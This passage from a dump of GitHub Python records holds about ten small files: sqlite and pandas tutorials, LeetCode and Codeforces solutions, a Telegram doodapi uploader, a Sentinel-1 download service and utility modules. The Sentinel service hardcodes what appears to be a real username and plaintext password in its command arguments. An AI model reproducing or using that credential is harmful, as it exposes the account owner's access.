sqlite3.connect('D:/coding/python/all/ch1/resource/database.db', isolation_level=None)\n\n# Cursor \nc = conn.cursor()\nprint('Cursor type : ', type(c)) # Cursor type :  <class 'sqlite3.Cursor'>\n\n\n# create table (data types: TEXT, NUMERIC, INTEGER, REAL, BLOB)\nc.execute(\"CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY, username text, email text, \\\n    phone text, website text, regidate text)\")\n\n\n\n# insert data (one row at a time)\n\nc.execute(\"INSERT INTO users VALUES(1, 'KIM', 'dk@naver.com', '010-4564-2524', 'KIMKIM.com', ?)\", (nowDatetime,))\n\nc.execute(\"INSERT INTO users(id, username, email, phone, website, regidate) VALUES(?,?,?,?,?,?)\",\n(2, \"park\", \"park@daum.net\",'010-5478-5554',\"we3.com\", nowDatetime))\n\n# insert many rows at once (tuple, list)\nuserlist = (\n    (3, 'Lee', 'Lee@naver.com', \"010-4545-5442\", 'LEE.com', nowDatetime),\n    (4, 'Cho', 'Cho@naver.com', \"010-4821-8763\", 'Cho.com', nowDatetime),\n    (5, 'Yoo', 'Yoo@naver.com', '010-5432-8777', 'Yoo.com', nowDatetime),\n)\n\nc.executemany(\"INSERT INTO users(id, username, email, phone, website, regidate)\\\n    VALUES (?,?,?,?,?,?)\", userlist)\n\n# later on, data received from the web will be stored into the database through sqlite\n\n\n\n# delete table data\n# conn.execute(\"DELETE FROM users\") # delete every row\n# delete while also reporting how many rows were removed\n# print(\"users db deleted : \" , conn.execute(\"DELETE FROM users\").rowcount,\"rows\") \n# users db deleted :  5 rows\n\n\n\n# commit : with isolation_level=None changes are applied automatically (auto-commit)\n# conn.commit()  # commit manually\n\n# rollback  # rollback is not run automatically\n# conn.rollback()\n\n# close the connection\n# conn.close()\n\n# always close any resource you have opened.
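\n# For example: with isolation_level=None (auto-commit), every execute() above\n# was committed immediately, so a conn.rollback() here would have nothing to undo.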
\n\n\n\n\n\n\n\n","repo_name":"sangdong88/Python","sub_path":"All/Ch1/section12-1.py","file_name":"section12-1.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14383735254","text":"# coding=utf-8\nimport collections\nclass Solution:\n    def combinationSum2(self, candidates, target):\n        def dfs(pos: int, rest: int):\n            nonlocal sequence\n            if rest == 0:\n                ans.append(sequence[:])\n                return\n            if pos == len(freq) or rest < freq[pos][0]:\n                return\n\n            dfs(pos + 1, rest)\n\n            most = min(rest // freq[pos][0], freq[pos][1])\n            for i in range(1, most + 1):\n                sequence.append(freq[pos][0])\n                dfs(pos + 1, rest - i * freq[pos][0])\n            sequence = sequence[:-most]\n\n        freq = sorted(collections.Counter(candidates).items())\n        ans = list()\n        sequence = list()\n        dfs(0, target)\n        return ans\nans = Solution().combinationSum2([10,1,2,7,6,1,5], 8)","repo_name":"xiawq1/leetcode-c-","sub_path":"leetcode/combinationSum2.py","file_name":"combinationSum2.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12369880295","text":"import contextlib\nimport shutil\nimport tempfile\n\n\n@contextlib.contextmanager\ndef NamedTemporaryDirectory(suffix='', prefix='tmp', dir=None):\n  \"\"\"A context manager that manages a temporary directory.\n\n  This is a context manager version of tempfile.mkdtemp. The arguments to this\n  function are the same as the arguments for that one.\n  \"\"\"\n  # This uses |dir| as a parameter name for consistency with mkdtemp.\n  # pylint: disable=redefined-builtin\n\n  d = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)\n  try:\n    yield d\n  finally:\n    shutil.rmtree(d)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/android_tools/sdk/platform-tools/systrace/catapult/common/py_utils/py_utils/tempfile_ext.py","file_name":"tempfile_ext.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"16405668467","text":"#!/usr/bin/env python3\n\n\n### Importing\nfrom botModule.importCommon import *\n\n\n### Start & Help Handler\n@Client.on_message(filters.private & filters.regex(r'^http(.*)'))\nasync def urlUploaderHandler(bot:Update, msg:Message):\n    if await search_user_in_community(bot, msg):\n        userid = msg.chat.id\n        result = apiExist(userid)\n        if result:\n            apiKey = result['apiKey']\n            apiUrl = f\"https://doodapi.com/api/upload/url?key={apiKey}\"\n            message = msg.text\n            if '|' in message:\n                url, filename = message.split(\"|\")\n                url = url.strip()  # strip spaces around the separator as well\n                filename = filename.strip()\n                if \" \" in filename:\n                    filename = '_'.join(filename.split(' '))\n                apiUrl += f\"&new_title={filename}\"\n            else:\n                url = msg.text\n                if \" \" in url:\n                    return await msg.reply_text(\n                        \"Gɪᴠᴇɴ Uʀʟ Is Iɴᴠᴀʟɪᴅ.\",\n                        parse_mode = \"html\"\n                    )\n                url = url.strip()\n            apiUrl += f\"&url={url}\"\n            fileID = uploadRequest(apiUrl)\n            if fileID:\n                fileurl = f'https://dood.la/d/{fileID}'\n                await msg.reply_text(\n                    f\"Yᴏᴜʀ Fɪʟᴇ Wɪʟʟ Bᴇ Uᴘʟᴏᴀᴅᴇᴅ Sᴏᴏɴ Oɴ Tʜɪs Uʀʟ :\\n{fileurl}\",\n                    parse_mode = \"html\"\n                )\n            else:\n                await msg.reply_text(\n                    \"Uɴᴀʙʟᴇ Tᴏ Uᴘʟᴏᴀᴅ Yᴏᴜʀ Fɪʟᴇ. 
Sᴏᴍᴇᴛʜɪɴɢ Wᴇɴᴛ Wʀᴏɴɢ.\",\n parse_mode = \"html\"\n )\n else:\n await msg.reply_text(\n \"Yᴏᴜʀ Aᴘɪ Kᴇʏ Is Nᴏᴛ Aᴅᴅᴇᴅ\\nAᴅᴅ Yᴏᴜʀ Aᴘɪ Kᴇʏ Bʏ Usɪɴɢ /add APIKEY.\",\n parse_mode = \"html\"\n ) \n return\n\n","repo_name":"aiombots/AIOM_DOODSTREAM_BOT","sub_path":"plugins/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20536752581","text":"#!/usr/bin/env python3\n\n# This is a wrapper for check_smart.pl\n# It will find all disks on the host and run check_smart.pl on each of them\n# and report back to nagios the worst response with a summary of the rest.\n# Notice that for smartctl to function as properly, it needs to run as root.\n\nfrom enum import IntEnum\nimport re\nimport subprocess\n\n\nclass NagiosRes(IntEnum):\n OK = 0\n WARNING = 1\n CRITICAL = 2\n UNKNOWN = 3\n\n\n# For the summary\nnagios_res_count = {\n \"OK\": 0,\n \"WARNING\": 0,\n \"CRITICAL\": 0,\n \"UNKNOWN\": 0,\n}\n\ntry:\n serials = []\n # Scan\n drives = (\n subprocess.check_output([\"sudo\", \"/usr/sbin/smartctl\", \"--scan-open\"])\n .decode()\n .splitlines()\n )\n drives_check_smart = []\n worst_nagios_res = 0 # OK\n p_serial = re.compile(r\"serial number: +(\\b.*\\b)\", re.IGNORECASE)\n p_smart_support = re.compile(r\"SMART support is: +(\\b.*\\b)\", re.IGNORECASE)\n\n for drive in drives:\n\n # drives that smartctl can't open\n if re.match(\"^#\", drive):\n continue\n\n # get the device name and device_type\n device, _, device_type, _ = drive.split(' ', 3)\n\n # in some situations smartctl might report the drives multiple times\n # we use the serial to check if we've seen the drive before\n smart_data = subprocess.check_output(\n [\"sudo\", \"/usr/sbin/smartctl\", \"-i\", device, \"-d\", device_type]\n ).decode()\n\n result = p_serial.search(smart_data)\n if result:\n # check for smart support\n result_smart_support = p_smart_support.search(smart_data)\n if result_smart_support:\n smart_unknown = \"Unavailable - device lacks SMART capability\"\n if result_smart_support.group(1) == smart_unknown:\n continue\n\n serial = result.group(1)\n # seen the drive before\n if serial in serials:\n continue\n\n # first time seeing the drive\n serials.append(serial)\n try:\n # Run the external per disk nagios check\n nagios_check = subprocess.check_output(\n [\n \"/usr/local/lib/nagios/plugins/check_smart.pl\",\n \"-d\",\n device,\n \"-i\",\n device_type,\n ]\n ).decode()\n # will only reach here if the return value from the check\n # is 0 (== \"OK\")\n nagios_res_count[\"OK\"] += 1\n except subprocess.CalledProcessError as nagiosexc:\n nagios_check = nagiosexc.output.decode()\n\n # Critical is worse than Warning\n # Warning is worse than Unknown\n # Unknown is worse than OK\n\n # If the current return code is UNKNOWN\n # we only elevate the worst if it was OK\n if (nagiosexc.returncode == NagiosRes.UNKNOWN\n and worst_nagios_res == NagiosRes.OK):\n worst_nagios_res = NagiosRes.UNKNOWN\n # Else If the current return code is WARNING\n # we only elevate the worst if it was OK or UNKNOWN\n elif (nagiosexc.returncode == NagiosRes.WARNING\n and (worst_nagios_res == NagiosRes.OK\n or worst_nagios_res == NagiosRes.UNKNOWN)):\n worst_nagios_res = NagiosRes.WARNING\n # Else If the current return code is CRITICAL\n # we always elevate as critical it the worst\n elif nagiosexc.returncode == NagiosRes.CRITICAL:\n worst_nagios_res = NagiosRes.CRITICAL\n\n nagios_res_count[NagiosRes(nagiosexc.returncode).name] 
+= 1\n\n            drives_check_smart.append(nagios_check)\n\n    # If there are no serials (drives) found return unknown\n    if len(serials) == 0:\n        print('UNKNOWN: No drives found.')\n\n        exit(NagiosRes.UNKNOWN)\n\n    else:\n        print(f'{NagiosRes(worst_nagios_res).name}: SMART checks result: '\n              f'{str(nagios_res_count)}')\n\n        for item in drives_check_smart:\n            print(item.strip())\n\n        exit(worst_nagios_res)\n\nexcept Exception as e:\n    print(f'{NagiosRes.UNKNOWN.name}: Script failure: {e}')\n\n    exit(NagiosRes.UNKNOWN)\n","repo_name":"NeCTAR-RC/puppet-physical","sub_path":"files/check_smart_wrapper.py","file_name":"check_smart_wrapper.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17451118138","text":"\n\"\"\"\nAnalysis of Salaries Data (Hands-On Activity)\n\n1. Which Male and Female Professor has the highest and the lowest salaries\n2. Which Professor takes the highest and lowest salaries.\n3. Missing Salaries - should be mean of the matching salaries of those \n   whose service is the same\n4. Missing phd - should be mean of the matching service \n5. How many are Male Staff and how many are Female Staff. \n   Show both in numbers and Graphically using Pie Chart. \n   Show both numbers and in percentage\n6. How many are Prof, AssocProf and AsstProf. \n   Show both in numbers and Graphically using a Pie Chart\n7. Who are the senior and junior most employees in the organization.\n8. Draw a histogram of the salaries divided into bins starting \n   from 50K and increment of 15K\n\"\"\"\n\n\n\n\n\nimport pandas as pd\n\ndf = pd.read_csv(\"Salaries.csv\")\n\n# 1. Which Male and Female Professor has the highest and the lowest salaries\n# (shown below for the lowest-paid female professor; the male and highest-paid\n# cases follow the same pattern with \"Male\" and .max())\n\n\ndf1 = df[(df[\"salary\"] == df[(df['sex'] == \"Female\") & (df[\"rank\"] == \"Prof\")][\"salary\"].min())]\nprint(df1)\n\n# 2. Which Professor takes the highest and lowest salaries.\n\ndf1 = df[(df[\"salary\"] == df[(df[\"rank\"] == \"Prof\")][\"salary\"].min())]\nprint(df1)\n\n\ndf2 = df[(df[\"salary\"] == df[(df[\"rank\"] == \"Prof\")][\"salary\"].max())]\nprint(df2)\n\n\n\n\n\n# 3. Missing Salaries - should be mean of the matching salaries of those \n# whose service is the same\n\ndf2 = df[(df[\"service\"] == 18)][\"salary\"].mean()\n\ndf1 = df[(df[\"service\"] == 18)]\n\ndf1 = df1.fillna(df2)\n\n\nprint(df1)\n\n\ndf3 = df[(df[\"service\"] == 2)][\"salary\"].mean()\n\ndf4 = df[(df[\"service\"] == 2)]\n\ndf4 = df4.fillna(df3)\n\nprint(df4)\n\n########## or ###########\n\nfor i in df[df[\"salary\"].isnull()][\"service\"].values:\n    \n    df4 = df[(df[\"service\"] == i)]\n    df3 = df[(df[\"service\"] == i)][\"salary\"].mean()\n    df4 = df4.fillna(df3)\n    print(df4)\n\n\n\n\n\n# 4. Missing phd - should be mean of the matching service \n\n\nfor i in df[df[\"phd\"].isnull()][\"service\"].values:\n    \n    df4 = df[(df[\"service\"] == i)]\n    df3 = df[(df[\"service\"] == i)][\"phd\"].mean()\n    df4 = df4.fillna(df3)\n    print(df4)\n\n\n\n\n\n\n\n\n# 5. How many are Male Staff and how many are Female Staff. \n# Show both in numbers and Graphically using Pie Chart. \n# Show both numbers and in percentage\n\n\ndf[\"sex\"].value_counts()\n\n\ndf[\"sex\"].value_counts(normalize = True)\n\nimport matplotlib.pyplot as plt\n\nlabels = \"Male\",\"Female\"\nsizes = [df[\"sex\"].value_counts()[0],df[\"sex\"].value_counts()[1]]\nexplode = 0,0\ncolors = [\"yellow\",\"pink\"]\nplt.pie(sizes,explode,labels,colors, autopct='%1.2f%%', shadow=True)\nplt.show()\n
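\n# Tip: value_counts(normalize=True) above returns fractions of the whole;\n# multiplying by 100 gives the percentages that autopct prints on the pie.\n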
\n\n\n\n# 6. How many are Prof, AssocProf and AsstProf. \n# Show both in numbers and Graphically using a Pie Chart\n\n\nprint(df[\"rank\"].value_counts())\n\nimport matplotlib.pyplot as plt\n\nlabels = df[\"rank\"].value_counts().index[0],df[\"rank\"].value_counts().index[1],df[\"rank\"].value_counts().index[2]\n\nsizes = [df[\"rank\"].value_counts().values[0],df[\"rank\"].value_counts().values[1],df[\"rank\"].value_counts().values[2]]\n\nexplode = 0,0,0\n\ncolors = [\"r\", \"g\", \"b\"]  # matplotlib's one-letter colour codes are lowercase\n\nplt.pie(sizes, explode, labels, colors, autopct = '%1.2f%%', shadow = True)\nplt.show()\n\n\n\n\n\n\n\n# 7. Who are the senior and junior most employees in the organization.\n\n\ndf[\"service\"].sort_values().head()\n\ndf['service'].sort_values().tail()\n\n\n\n\n# 8. Draw a histogram of the salaries divided into bins starting \n# from 50K and increment of 15K\n\n\n\n\n\nimport matplotlib.pyplot as plt\n\na = df[\"salary\"].sort_values().values\n\nplt.hist(a, bins = [50000,65000,80000,95000,110000,125000,140000,155000,170000,185000,200000])\n\nplt.xlim(25000, 215000)  # plt.axis(25000, 215000) raises a TypeError; it expects [xmin, xmax, ymin, ymax]\n\nplt.xlabel(\"salary\")\n\nplt.ylabel(\"candidate\")\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Kamesh-Mishra/Data_Science","sub_path":"Data Analytics/hands_on_activity.py","file_name":"hands_on_activity.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40104530714","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\n\n# Read the HTML file as a string\nwith open(\"example.html\", \"r\") as f:\n    html_string = f.read()\n\n# Parse the HTML content using BeautifulSoup\nsoup = BeautifulSoup(html_string, \"html.parser\")\n\n# Extract all image tags from the HTML and get the src attribute for each one\nimage_urls = []\nfor img in soup.find_all(\"img\"):\n    image_urls.append(img.get(\"src\"))\n\n# Create the images directory if it doesn't exist\nif not os.path.exists(\"./images\"):\n    os.makedirs(\"./images\")\n\n# Download each image into the images directory\nfor url in image_urls:\n    response = requests.get(url)\n    filename = url.split(\"/\")[-1]\n    with open(\"./images/\" + filename, \"wb\") as f:\n        f.write(response.content)\n\n# Print a message indicating that the download is complete\nprint(\"Images downloaded successfully!\")\n\n","repo_name":"jinpeng/codesnippets","sub_path":"python/extract_text_image_from_html.py","file_name":"extract_text_image_from_html.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71155157286","text":"# ver1) using itertools blew past the memory limit...
ㅎ_ㅎ\n\n\n\n# from itertools import permutations\n\n# T = int(input())\n\n\n# for t in range(1, T+1):\n# N = int(input())\n# counts = list(map(int, input().split()))\n# nums = list(map(int,input().split()))\n# ops = '+-*/'\n# operators = []\n# for i in range(4):\n# for j in range(counts[i]):\n# operators.append(ops[i])\n\n# answer = []\n\n# for p in permutations(operators):\n# result = nums[0]\n# for n in range(N-1):\n# if p[n] == '+':\n# result = result + nums[n+1]\n# elif p[n] == '-':\n# result = result - nums[n+1]\n# elif p[n] == '*':\n# result = result * nums[n+1]\n# elif p[n] == '/':\n# result = int(result/nums[n+1])\n# answer.append(result)\n \n# print('#{} {}'.format(t, max(answer) - min(answer)))\n\n\n\n# ver 2)\n\nT = int(input())\n\ndef f(n, total):\n global min_val, max_val\n if n >= N:\n max_val = max(max_val,total)\n min_val = min(min_val,total)\n return\n else:\n for i in range(4):\n if operators[i] > 0:\n operators[i] -= 1\n\n if i == 0:\n f(n+1, total + nums[n])\n elif i ==1:\n f(n+1, total - nums[n])\n elif i ==2:\n f(n+1, total * nums[n])\n elif i ==3:\n f(n+1, int(total/nums[n]))\n\n operators[i] +=1\n\nfor t in range(1, T+1):\n N = int(input())\n operators = list(map(int, input().split()))\n nums = list(map(int,input().split()))\n\n min_val = 10000000\n max_val = -10000000\n\n f(1, nums[0])\n \n print('#{} {}'.format(t, max_val - min_val))","repo_name":"chloe-codes1/algorithm","sub_path":"SW-Expert-Academy/모의_SW_역량테스트/4008_숫자_만들기.py","file_name":"4008_숫자_만들기.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22494763228","text":"from tensorflow.keras.applications import VGG16\nfrom tensorflow.keras import models\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import (\n concatenate, Dense, Dropout, BatchNormalization, Flatten, Input,\n)\n\n\ndef build_vgg16_single_input(input_shape=(256, 256, 3)):\n \"\"\"Corresponds to model_vgg_ver2 of Modelling.ipynb file\"\"\"\n # Single input VGG16 transfer learn\n vgg_base = VGG16(weights='imagenet', include_top=False, input_shape=input_shape)\n\n model = models.Sequential()\n\n model.add(vgg_base)\n model.add(Flatten())\n model.add(Dropout(rate=0.4))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n vgg_base.trainable = False\n\n return model\n\n\ndef build_vgg16_double_input(input_shape=(256, 256, 3)):\n \"\"\"Corresponds to model_10 of Modelling.ipynb file\"\"\"\n # Double input VGG16 transfer learn\n vgg_base = VGG16(weights='imagenet', include_top=False, input_shape=input_shape)\n\n # define two sets of inputs\n zoom_1 = Input(shape=input_shape)\n zoom_2 = Input(shape=input_shape)\n\n # process zoom level 1 patch\n conv_1 = vgg_base(zoom_1)\n flatten_1 = Flatten()(conv_1)\n\n # process zoom level 2 patch\n conv_2 = vgg_base(zoom_2)\n flatten_2 = Flatten()(conv_2)\n\n # combine output of convolutional layers\n combined = concatenate([flatten_1, flatten_2])\n combined = BatchNormalization()(combined)\n combined = Dropout(rate=0.4)(combined)\n\n # fully connected layer after combined outputs\n z = Dense(128, activation=\"relu\")(combined)\n z = BatchNormalization()(z)\n z = Dropout(rate=0.4)(z)\n z = Dense(1, activation=\"sigmoid\")(z)\n\n vgg_base.trainable = False\n\n model = Model(inputs=[zoom_1, zoom_2], outputs=z)\n\n return 
model\n","repo_name":"lazysjb/camelyon16","sub_path":"models/model_build.py","file_name":"model_build.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12205964970","text":"import os\r\nimport sys\r\nimport json\r\nimport importlib\r\nfrom datetime import datetime\r\nimport jittor as jt\r\nfrom network import Network\r\nfrom dataset import ShapeNet\r\n\r\n\r\ndef prepare(config):\r\n jt.flags.use_cuda = 1\r\n os.makedirs(config['experiment']['dir'])\r\n with open(os.path.join(config['experiment']['dir'], 'config.json'), 'w') as f:\r\n json.dump(config, f, indent=4)\r\n src_dir = os.path.join(config['experiment']['dir'], 'src')\r\n os.makedirs(src_dir)\r\n os.system('cp *.py ' + src_dir)\r\n os.makedirs(config['experiment']['ckpt_save_dir'])\r\n\r\n\r\ndef train(config):\r\n prepare(config)\r\n train_dataset = ShapeNet(config['train_dataset'])\r\n network = Network(config['network'], len(train_dataset.split))\r\n decoder_optimizer = jt.nn.Adam(network.decoder.parameters(), config['train']['decoder_init_lr'])\r\n decoder_lr_scheduler = jt.lr_scheduler.StepLR(decoder_optimizer, step_size=config['train']['decoder_lr_decay_step'], gamma=config['train']['decoder_lr_decay_rate'])\r\n latent_codes_optimizer = jt.nn.Adam(network.code_cloud.parameters(), config['train']['latent_codes_init_lr'])\r\n latent_codes_lr_scheduler = jt.lr_scheduler.StepLR(latent_codes_optimizer, step_size=config['train']['latent_codes_lr_decay_step'], gamma=config['train']['latent_codes_lr_decay_rate'])\r\n\r\n network.train()\r\n for epoch in range(config['train']['num_epoch']):\r\n print('****** %s ******\\ntime: %s\\nepoch: %d/%d' % (config['experiment']['name'], datetime.now().strftime('%Y-%m-%d %H:%M:%S'), epoch, config['train']['num_epoch']))\r\n for batch_idx, (query_points, gt_sd, indices) in enumerate(train_dataset):\r\n pred_sd = network(indices, query_points)\r\n loss_dict = network.loss(gt_sd)\r\n decoder_optimizer.zero_grad()\r\n decoder_optimizer.step(loss_dict['total_loss'])\r\n latent_codes_optimizer.zero_grad()\r\n latent_codes_optimizer.step(loss_dict['total_loss'])\r\n print('Current epoch progress: %d/%d...' % (batch_idx, len(train_dataset)), end='\\r')\r\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'Current epoch progress: %d/%d. Done.' 
% (len(train_dataset), len(train_dataset)))\r\n        decoder_lr_scheduler.step()\r\n        latent_codes_lr_scheduler.step()\r\n\r\n        for k, v in loss_dict.items():\r\n            print(k, ':', v.numpy()[0])\r\n        print('decoder lr :', decoder_optimizer.lr)\r\n        print('latent codes lr :', latent_codes_optimizer.lr)\r\n\r\n    network.decoder.save(os.path.join(config['experiment']['ckpt_save_dir'], 'decoder.pkl'))\r\n    network.code_cloud.save(os.path.join(config['experiment']['ckpt_save_dir'], 'latent_codes.pkl'))\r\n    print('Trained models are saved to', config['experiment']['ckpt_save_dir'])\r\n\r\n\r\nif __name__ == '__main__':\r\n    config = importlib.import_module(sys.argv[1]).config\r\n    train(config)\r\n","repo_name":"lity20/DCCDIF-jittor","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"73175826726","text":"\"\"\"Basic sentinelsat WPS implementation.\"\"\"\nfrom pywps import EO4AProcess  # Import the EO4AProcess class\nfrom pywps import ComplexInput, LiteralInput, LiteralOutput\nfrom pywps.inout.literaltypes import AllowedValue\nfrom pywps.validator.allowed_value import ALLOWEDVALUETYPE\nfrom pywps import UOM\nimport os\n\n# WPS Format validation\nfrom pywps import Format\nfrom pywps.validator.mode import MODE\nfrom pywps.app.Common import Metadata\n\n__author__ = 'ajuracic'\n\n\nclass SentinelDownload(EO4AProcess):\n    \"\"\"Basic SentinelSat download of Sentinel 1 WPS service.\n\n    Parameters\n    ----------\n    search_polygon: GeoJson region\n    start_date: Start date YYYYMMDD\n    end_date: End date YYYYMMDD\n\n    Returns\n    ----------\n    output_dir: The path to the downloaded sentinel products\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Declare the service inputs and outputs.\"\"\"\n        inputs = [\n            ComplexInput(\n                'search_polygon', 'GeoJSON region',\n                supported_formats=[Format('application/vnd.geo+json')],\n                abstract=\"\"\"\n                GeoJson of region to search\n                \"\"\",\n                mode=MODE.SIMPLE,\n                max_occurs=1\n            ),\n            LiteralInput(\n                'start_date', 'Start date',\n                abstract=\"\"\"\n                Datestamp in format YYYYMMDD\n                \"\"\",\n                data_type='integer',\n                max_occurs=1\n            ),\n            LiteralInput(\n                'end_date', 'End date',\n                abstract=\"\"\"\n                Datestamp in format YYYYMMDD\n                \"\"\",\n                data_type='integer',\n                max_occurs=1\n            )\n        ]\n        outputs = [\n            LiteralOutput(\n                'output_dir',\n                'Workflow data volume path',\n                data_type='string',\n                abstract=\"\"\"\n                Path to a directory within the Workflow Data volume.\n                The service will store all outputs in this dir, then\n                provide a reference to the directory which other services\n                can use.\n                \"\"\",\n            )\n        ]\n\n        super(SentinelDownload, self).__init__(\n            identifier='acquisition:sentinel1',\n            abstract=\"\"\"\n            Use sentinelsat python module to download Sentinel 1 data\n            \"\"\",\n            version='0.1',\n            title=\"Download Sentinel 1 Data (referencing data volume)\",\n            metadata=[Metadata('Testing')],\n            profile='',\n            inputs=inputs,\n            outputs=outputs,\n        )\n\n    def get_command(self, request, response):\n        \"\"\"The service command. Do not do any processing here.\"\"\"\n
        inputs = request.inputs\n        self.sen1_dir = '/data_service/'\n        #self.mkdir(self.sen1_dir)\n        # Query, include only L2, OCN data\n        self.query = \"producttype=OCN\"\n        return [\n            \"sentinel\", \"search\", \"--sentinel1\", \"-d\",\n            \"-s\", str(inputs['start_date'][0].source),\n            \"-e\", str(inputs['end_date'][0].source),\n            \"-q\", str(self.query),\n            \"-p\", str(self.sen1_dir),\n            \"ajuracic\", \"S1lj0M1k1!\",\n            inputs['search_polygon'][0].file\n        ]\n\n    def set_output(self, request, response):\n        \"\"\"Set the output from the WPS request.\"\"\"\n        workflow_disk_result_path = self.get_workflow_disk_path(self.sen1_dir)\n        response.outputs['output_dir'].data = workflow_disk_result_path\n        response.outputs['output_dir'].uom = UOM('unity')\n","repo_name":"anajura-ps/eo4a-sswind-services","sub_path":"acquisition:sentinel1/wps_definition.py","file_name":"wps_definition.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15240919900","text":"class Mileage:\r\n    @staticmethod  # called on the class itself, so no self parameter\r\n    def route_mileage(time, del1, del2, del3):\r\n        # calculate miles unless query time is less than delivery start time\r\n        # Space-Time Complexity: O(1)\r\n        def get_miles(delivery, time):\r\n            miles = 0\r\n            hours = time.hour + time.minute / 60 + time.second / 3600\r\n            if hours > delivery[3]:\r\n                # truck speed is 18 mph, capped at the delivery's full distance\r\n                miles = float(\"{:.2f}\".format(min((hours - delivery[3]) * 18, delivery[1])))\r\n                return miles\r\n            return miles\r\n        \r\n        del1_miles = get_miles(del1, time)\r\n        del2_miles = get_miles(del2, time)\r\n        del3_miles = get_miles(del3, time)\r\n        total_miles = float(\"{:.2f}\".format(del1_miles + del2_miles + del3_miles))\r\n        return del1_miles, del2_miles, del3_miles, total_miles\r\n    \r\n    ","repo_name":"maaxxxx22/Package-Routing-System-","sub_path":"rt_mileage.py","file_name":"rt_mileage.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34431097357","text":"# two teams of equal size: one of distinct values, one of copies of a single\n# value; the most frequent value can serve on either side, hence the two cases.\nt=int(input())\nwhile(t!=0):\n    n=int(input())\n    arr=list(map(int,input().split()))[:n]\n    uniqueCount=0\n    myMap={}\n    for i in range(n):\n        if(myMap.get(arr[i]) is None):\n            uniqueCount+=1\n            myMap[arr[i]]=1\n        else:\n            myMap[arr[i]]+=1\n    sameCount=max(myMap.values())\n    if(sameCount==uniqueCount-1):\n        print(sameCount)\n    else:\n        print(max(min(sameCount,uniqueCount-1),min(sameCount-1,uniqueCount)))\n    t-=1\n","repo_name":"raghavbiyani19/CodeForces","sub_path":"1335C.py","file_name":"1335C.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70869495205","text":"import random\nimport re\nimport string\n\nPADDING = 1\nVPADDING = 1\nDOUBLE_SPACE = False\nPATTERN_LEN = 15\nPATTERN_CHARS = string.ascii_uppercase + string.digits\n\n\nclass stereo_panel(object):\n    \"\"\"This is a class for building text-based autostereograms.\n    Any text passed in 'lines' surrounded by /forward slashes/ will\n    pop out in the foreground. 
Any text passed in 'lines' surrounded\n by \\backslashes\\ will pop out in the background.\"\"\"\n def __init__(self, lines, padding_len=PADDING,\n vpadding_len=VPADDING, double_space=DOUBLE_SPACE):\n \"\"\"lines: (multiline string) Text to be used in autostereogram,\n with text in /forward slashes/ placed in the foreground, and\n text in \\backslashes\\ placed in the background\n padding_len: (int) Number of spaces to place before and after\n the longest line of text\n vpadding_len: (int) Number of blank lines to place above and\n below the block of text\"\"\"\n self.lines = []\n for line in lines.split('\\n'):\n self.lines.append(line.strip())\n self.padding_len = padding_len\n self.vpadding_len = vpadding_len\n self.double_space = double_space\n\n def get_lines(self):\n return self.lines.copy()\n\n def get_longest_line(self):\n \"\"\"returns length of longest line from self.lines, which is\n needed for calculating padding\"\"\"\n longest_line = 0\n for line in self.get_stripped_lines():\n if len(line) > longest_line:\n longest_line = len(line)\n return longest_line\n\n def get_padding_len(self):\n \"\"\"returns number of spaces to be placed before and after the\n longest line\"\"\"\n return self.padding_len\n\n def set_padding_len(self, pad_len):\n \"\"\"pad_len: (int) Number of spaces to be placed before and\n after the longest line\"\"\"\n self.padding_len = pad_len\n\n def get_vpadding_len(self):\n \"\"\"Returns number of blank lines to be placed before and after\n block of text\"\"\"\n return self.vpadding_len\n\n def set_vpadding_len(self, vpad_len):\n \"\"\"vpad_len: (int) Number of blank lines to be placed before and\n after block of text\"\"\"\n self.vpadding_len = vpad_len\n\n def get_double_space(self):\n return self.double_space\n\n def set_double_space(self, double_space):\n self.double_space = double_space\n\n def get_stripped_lines(self):\n \"\"\"Returns list of lines with forward slashes, and backslashes\n stripped\"\"\"\n stripped_lines = []\n for line in self.get_lines():\n if self.get_double_space():\n line = line.replace(' ', ' ')\n stripped_line = line.replace('/', '')\n stripped_line = stripped_line.replace('\\\\', '')\n stripped_lines.append(stripped_line)\n return stripped_lines.copy()\n\n def get_stereo_lines(self):\n \"\"\"Returns list of lines with words in 